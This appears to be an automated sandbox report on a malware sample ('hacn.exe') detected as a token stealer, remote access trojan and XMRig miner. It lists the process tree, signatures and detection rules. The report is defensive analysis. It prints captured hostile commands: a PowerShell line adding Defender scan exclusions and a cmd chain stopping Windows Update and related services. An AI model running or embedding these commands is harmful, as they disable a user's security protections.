Edit tour

Windows Analysis Report
hacn.exe

Overview

General Information

Sample name:	hacn.exe
Analysis ID:	1401452
MD5:	98ae932a21fee19c4b51ffa7abd4cec1
SHA1:	e4db77c1248591ba12160223e028004ffd3366d3
SHA256:	d0c18b8e222e3b9c09c05145bab139b63e010ba754f4ff688ee71ac69697a402
Tags:	exe
Infos:

Detection

Discord Token Stealer, Millenuim RAT, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Snort IDS alert for network traffic

Yara detected Discord Token Stealer

Yara detected Millenuim RAT

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected Xmrig cryptocurrency miner

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to capture screen (.Net source)

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Found hidden mapped module (file has been removed from disk)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

hacn.exe (PID: 7572 cmdline: C:\Users\user\Desktop\hacn.exe MD5: 98AE932A21FEE19C4B51FFA7ABD4CEC1)

hacn.exe (PID: 7588 cmdline: C:\Users\user\Desktop\hacn.exe MD5: 98AE932A21FEE19C4B51FFA7ABD4CEC1)

cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

s.exe (PID: 7688 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym MD5: 232B5DBB1510598F8A683DD2752A99C4)

main.exe (PID: 7748 cmdline: "C:\ProgramData\main.exe" MD5: DE8515E07D1C34FFF3C1DDD4FEE593FB)

cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7308 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 7332 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 7884 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

tasklist.exe (PID: 8136 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 8152 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 8092 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

tasklist.exe (PID: 7792 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 8064 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

timeout.exe (PID: 7384 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)

setup.exe (PID: 7768 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

dialer.exe (PID: 6832 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 988 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)

powershell.exe (PID: 7792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8064 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8112 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8128 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8144 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8160 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8176 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

updater.exe (PID: 1436 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: 1274CBCD6329098F79A3BE6D76AB8B97)

dialer.exe (PID: 8096 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dialer.exe (PID: 2784 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

dialer.exe (PID: 1508 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

Conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7876 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7816 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7840 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8076 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8112 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8176 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\ProgramData\main.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\ProgramData\main.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\ProgramData\main.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Windows\Temp\wxyubnjmnlae.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\wxyubnjmnlae.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37e798:$a1: mining.set_target 0x370a20:$a2: XMRIG_HOSTNAME 0x373348:$a3: Usage: xmrig [OPTIONS] 0x3709f8:$a4: XMRIG_VERSION
C:\Windows\Temp\wxyubnjmnlae.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8631:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\wxyubnjmnlae.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c8eb8:$s1: %s/%s (Windows NT %lu.%lu 0x3cc9c8:$s3: \\.\WinRing0_ 0x375948:$s4: pool_wallet 0x36fdf0:$s5: cryptonight 0x36fe00:$s5: cryptonight 0x36fe10:$s5: cryptonight 0x36fe20:$s5: cryptonight 0x36fe38:$s5: cryptonight 0x36fe48:$s5: cryptonight 0x36fe58:$s5: cryptonight 0x36fe70:$s5: cryptonight 0x36fe80:$s5: cryptonight 0x36fe98:$s5: cryptonight 0x36feb0:$s5: cryptonight 0x36fec0:$s5: cryptonight 0x36fed0:$s5: cryptonight 0x36fee0:$s5: cryptonight 0x36fef8:$s5: cryptonight 0x36ff10:$s5: cryptonight 0x36ff20:$s5: cryptonight 0x36ff30:$s5: cryptonight
Click to see the 9 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x384cb8:$a1: mining.set_target 0x376f40:$a2: XMRIG_HOSTNAME 0x379868:$a3: Usage: xmrig [OPTIONS] 0x376f18:$a4: XMRIG_VERSION
Process Memory Space: main.exe PID: 7748	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: main.exe PID: 7748	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
Process Memory Space: main.exe PID: 7748	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: main.exe PID: 7748	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.main.exe.244178405b8.1.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
5.0.main.exe.244178405b8.1.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
5.0.main.exe.244178405b8.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.0.main.exe.244178405b8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.0.main.exe.244176d0000.0.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
5.0.main.exe.244176d0000.0.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
5.0.main.exe.244176d0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.0.main.exe.244176d0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
49.2.dialer.exe.21cc15ed520.3.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
49.2.dialer.exe.21cc15ed520.3.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37d398:$a1: mining.set_target 0x36f620:$a2: XMRIG_HOSTNAME 0x371f48:$a3: Usage: xmrig [OPTIONS] 0x36f5f8:$a4: XMRIG_VERSION
49.2.dialer.exe.21cc15ed520.3.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c7231:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
49.2.dialer.exe.21cc15ed520.3.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c7ab8:$s1: %s/%s (Windows NT %lu.%lu 0x3cb5c8:$s3: \\.\WinRing0_ 0x374548:$s4: pool_wallet 0x36e9f0:$s5: cryptonight 0x36ea00:$s5: cryptonight 0x36ea10:$s5: cryptonight 0x36ea20:$s5: cryptonight 0x36ea38:$s5: cryptonight 0x36ea48:$s5: cryptonight 0x36ea58:$s5: cryptonight 0x36ea70:$s5: cryptonight 0x36ea80:$s5: cryptonight 0x36ea98:$s5: cryptonight 0x36eab0:$s5: cryptonight 0x36eac0:$s5: cryptonight 0x36ead0:$s5: cryptonight 0x36eae0:$s5: cryptonight 0x36eaf8:$s5: cryptonight 0x36eb10:$s5: cryptonight 0x36eb20:$s5: cryptonight 0x36eb30:$s5: cryptonight
5.0.main.exe.244176def04.2.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
5.0.main.exe.244176def04.2.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
5.0.main.exe.244176def04.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.0.main.exe.244176def04.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
49.2.dialer.exe.21cc15ed520.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
49.2.dialer.exe.21cc15ed520.3.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x37e798:$a1: mining.set_target 0x370a20:$a2: XMRIG_HOSTNAME 0x373348:$a3: Usage: xmrig [OPTIONS] 0x3709f8:$a4: XMRIG_VERSION
49.2.dialer.exe.21cc15ed520.3.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3c8631:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
49.2.dialer.exe.21cc15ed520.3.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3c8eb8:$s1: %s/%s (Windows NT %lu.%lu 0x3cc9c8:$s3: \\.\WinRing0_ 0x375948:$s4: pool_wallet 0x36fdf0:$s5: cryptonight 0x36fe00:$s5: cryptonight 0x36fe10:$s5: cryptonight 0x36fe20:$s5: cryptonight 0x36fe38:$s5: cryptonight 0x36fe48:$s5: cryptonight 0x36fe58:$s5: cryptonight 0x36fe70:$s5: cryptonight 0x36fe80:$s5: cryptonight 0x36fe98:$s5: cryptonight 0x36feb0:$s5: cryptonight 0x36fec0:$s5: cryptonight 0x36fed0:$s5: cryptonight 0x36fee0:$s5: cryptonight 0x36fef8:$s5: cryptonight 0x36ff10:$s5: cryptonight 0x36ff20:$s5: cryptonight 0x36ff30:$s5: cryptonight
49.2.dialer.exe.21cc15e9c40.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
49.2.dialer.exe.21cc15e9c40.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x382078:$a1: mining.set_target 0x374300:$a2: XMRIG_HOSTNAME 0x376c28:$a3: Usage: xmrig [OPTIONS] 0x3742d8:$a4: XMRIG_VERSION
49.2.dialer.exe.21cc15e9c40.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x3cbf11:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
49.2.dialer.exe.21cc15e9c40.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3cc798:$s1: %s/%s (Windows NT %lu.%lu 0x3d02a8:$s3: \\.\WinRing0_ 0x379228:$s4: pool_wallet 0x3736d0:$s5: cryptonight 0x3736e0:$s5: cryptonight 0x3736f0:$s5: cryptonight 0x373700:$s5: cryptonight 0x373718:$s5: cryptonight 0x373728:$s5: cryptonight 0x373738:$s5: cryptonight 0x373750:$s5: cryptonight 0x373760:$s5: cryptonight 0x373778:$s5: cryptonight 0x373790:$s5: cryptonight 0x3737a0:$s5: cryptonight 0x3737b0:$s5: cryptonight 0x3737c0:$s5: cryptonight 0x3737d8:$s5: cryptonight 0x3737f0:$s5: cryptonight 0x373800:$s5: cryptonight 0x373810:$s5: cryptonight
Click to see the 19 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8064, ProcessName: cmd.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7792, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6832, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7792, ProcessName: powershell.exe

Snort Signatures

ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	03/01/24-15:22:10.789667
SID:	2036289
Source Port:	63417
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Avira: detection malicious, Label: RKIT/Agent.diumn

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\main.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	ReversingLabs: Detection: 65%
Source: C:\Windows\Temp\wxyubnjmnlae.tmp	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: hacn.exe

ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\main.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hacn.exe

Joe Sandbox ML: detected

Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB9020 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,	5_2_00007FFDF7CB9020
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB8FE0 CryptReleaseContext,	5_2_00007FFDF7CB8FE0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB8DC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,	5_2_00007FFDF7CB8DC0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF0B50 GetCurrentProcessId,GetEnvironmentVariableA,lstrlenA,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,wsprintfA,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcmpA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	5_2_00007FFDF7CF0B50

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
